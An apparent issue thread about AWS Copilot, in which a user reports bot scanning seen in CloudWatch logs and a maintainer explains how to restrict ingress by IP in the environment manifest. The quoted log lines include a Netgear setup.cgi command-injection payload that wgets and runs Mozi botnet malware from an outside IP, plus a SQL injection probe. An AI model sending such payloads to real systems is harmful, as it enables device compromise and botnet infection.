Just a Word Of Warning ! -- Bots

[Hillsie]

While playing around with Copilot and deploying docker images, I took a look at the cloudwatch logs
and noticed that it's being hammered by a bot looking for vulnerabilities.

A short sample.

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://183.134.156.35:48768/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 

/phpnuke/html/modules/Forums/bb_smilies.php

/recipe/recipe/login.php?Username=foo'&Password=bar&submit=Login

I've added a my IP as the source in the security group. Hopefully, it doesn't cause an issue when deleting the stack.

Maybe a feature request to have the IP Address blocking while developing as an option?

[bvtujo]

Thanks for reporting this! Sorry your endpoints are getting hit so hard.

You can actually specify arbitrary security group rules on the public ALB by using network.vpc.security_group.ingress in the environment manifest, and you can lock down the traffic to specific IP addresses using http.public.ingress.source_ips, also in the env manifest. Either one of these options is copilot-native and shouldn't interfere with stack deletion.